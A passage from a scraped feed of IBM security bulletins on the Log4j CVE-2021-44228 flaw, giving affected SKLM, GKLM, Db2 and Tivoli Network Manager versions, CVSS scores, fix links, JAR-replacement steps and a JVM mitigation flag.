Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.\n\n \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customer with extension.\n\n## Remediation/Fixes\n\n**IMPORTANT**\n\nThe fix in this bulletin has been superseded by [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539408>). \n--- \n \n**IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nDepending on your GKLM/SKLM version, see the relevant section:\n\n * For SKLM 3.0, 3.0.1 and SKLM 4.0\n * For GKLM 4.1\n * For GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1 and SKLM 4.0\n\nFor information about the vulnerability fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \u200b\u200b\u200b.\u200b\u200b\n\nYou only need to apply the interim fix provided by the WAS team. Before you apply the interim fix, check the WAS minimum fix pack requirement and the supported WAS for your SKLM version (see [Support Matrix](<https://www.ibm.com/support/pages/node/296957>)). \n\nFor instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Note:** _Also applicable for SKLM 2.7_ (**only for customers with extension**).\n\n** Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.0\n\n 1. On Linux and AIX systems, log in as the database user. For example, sklmdb41.\n 2. Stop WebSphere Application Server.\n\n**On Linux or AIX:**\n \n WAS_HOME/bin/stopServer.sh\u00a0server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/stopServer.sh server1 -username wasadmin -password waspassword\n\n**On Windows:**\n \n WAS_HOME\\bin\\stopServer.bat server1 -username WAS_USER -password WAS_PASSWORD\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\stopServer.bat server1 -username wasadmin -password waspassword\n\n 3. Apply the WebSphere Application Server interim fix provided by the WAS team. For instructions, see [How to install WebSphere Application Server interim fix](<https://www.ibm.com/support/pages/node/6538024>). \n\nFor information about the vulnerability and fixes, see [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) . \n\n**Note**: You only need to apply the interim fix provided by the WAS team.\n\n 4. Update Log4j.\n\n 1. Download the latest log4j 2.15.0 files from the following link: \n\n<https://archive.apache.org/dist/logging/log4j/2.15.0/>\n\n 2. Depending on your platform, download the applicable file: \n * apache-log4j-2.15.0-bin.tar.gz\n * apache-log4j-2.15.0-bin.zip\n 3. Extract the downloaded files. Copy the following extracted JAR files to some other location (for example, desktop): \n * log4j-api-2.15.0.jar\n * log4j-core-2.15.0.jar\n 4. Rename the JAR files as follows: \n * log4j-api-2.15.0.jar to log4j-api-2.13.3.jar\n * log4j-core-2.15.0.jar to log4j-core-2.13.3.jar\n\n**Note:** This is a workaround. Because of this workaround, even after you apply the fix, the grep command shows log4j-api-2.13.3.jar version in the output. However, be assured that Log4j is upgraded to log4j-api-2.15.0.jar.\n\n 5. Copy the renamed Log4j JAR files to the following location: \n\n**On Linux or AIX:**\n \n WAS_HOME/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/profiles/KLMProfile/installedApps/SKLMCell/sklm_kms.ear/lib\n\n**On Windows:**\n \n WAS_HOME\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\profiles\\KLMProfile\\installedApps\\SKLMCell\\sklm_kms.ear\\lib\n\n 5. Start WebSphere Application Server. \n\n**On Linux or AIX:**\n \n WAS_HOME/bin/startServer.sh server1\n\nFor example,\n \n /opt/IBM/WebSphere/AppServer/bin/startServer.sh server1\n\n**On Windows:**\n \n WAS_HOME\\bin\\startServer.bat server1\n\nFor example,\n \n C:\\Program Files\\IBM\\WebSphere\\AppServer\\bin\\startServer.bat server1\n\n** **\n\n** **\n\n** ****Recommended: Upgrade Java**\n\nAfter you apply the WAS interim fix, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required.\n\n* * *\n\n## For GKLM 4.1.1\n\nThis issue is fixed in [GKLM 4.1.1 - Fix Pack 2](<https://www.ibm.com/support/pages/node/6525282> \"GKLM 4.1.1 - Fix Pack 2\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n* * *\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T14:07:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in WebSphere Application Server shipped with IBM Security Key Lifecycle Manager (SKLM) and IBM Security Guardium Key Lifecycle Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T14:07:15", "id": "30E9FB4250193CA2C5AB02F5095C96F34F2044E06280324E18E38EEFD7C1490E", "href": "https://www.ibm.com/support/pages/node/6527756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:06:07", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 for bulletins relating to Log4j V2. Updating log4j to a version 2.15.0 or higher also addresses CVE-2021-4104.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured: \n\n\nFederation: \n\n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| \n\nIT39389\n\n| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A980553972695302272&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| \n\nIT39389\n\n| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134833_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A479485515202753152&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134832_DSClients-linuxia32-client-11.5.7.0-FP000%3A596706133826041984&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134831_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A137760201590747536&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134835_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A909787610102068096&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134834_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A651865390747364992&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13323_134829_DSClients-nt32-client-11.5.7000.1973-FP000%3A855115844514252672&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13323_134830_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A352392631134626240&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \n## Workarounds and Mitigations\n\nA user with SYSADM authority should preform the following:\n\ndb2stop\n\ndb2set DB2_JVM_STARTARGS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\ndb2start\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Updated related links for other Log4j bulletins. \n21 Dec 2021: Links for 11.5.7 Windows 32-bit and Windows 64-bit have been added \n20 Dec 2021: Links for 11.5.6 Windows 32-bit and Windows 64-bit have been added \n16 Dec 2021: Updated to reflect that all Db2 editions are impacted. Added instructions to determine if Federation is enabled. \n16 Dec 2021: Added fix pack links for 11.5.7 special builds on AIX 64-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian \n15 Dec 2021: Added fix pack links for 11.5.6 special builds on AIX 64-bit, Linux 32-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \nAdded fix pack links for 11.5.7 special builds on Linux 32-bit, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T03:33:10", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T03:33:10", "id": "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "href": "https://www.ibm.com/support/pages/node/6526462", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:05:10", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Network Manager version 4.2.0.x. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNM| 4.2.0.x \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNM| 4.2.0.x| \n\n[Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server](<https://www.ibm.com/support/pages/node/6538148> \"Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server\" )\n\nSee section: For V8.5.0.0 through 8.5.5.20:\n\nSee section: For V9.0.0.0 through 9.0.5.10: \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nNone\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nNone\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHRK\",\"label\":\"Tivoli Network Manager IP Edition\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"4.2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {}, "published": "2022-01-13T05:46:44", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Network Manager IP Edition (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-13T05:46:44", "id": "67A6DAD4F7DB5EFA4D058E5FA0886E6D1185C31EE7AFA1B194E5CA4D0F4A3F5C", "href": "https://www.ibm.com/support/pages/node/6540536", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 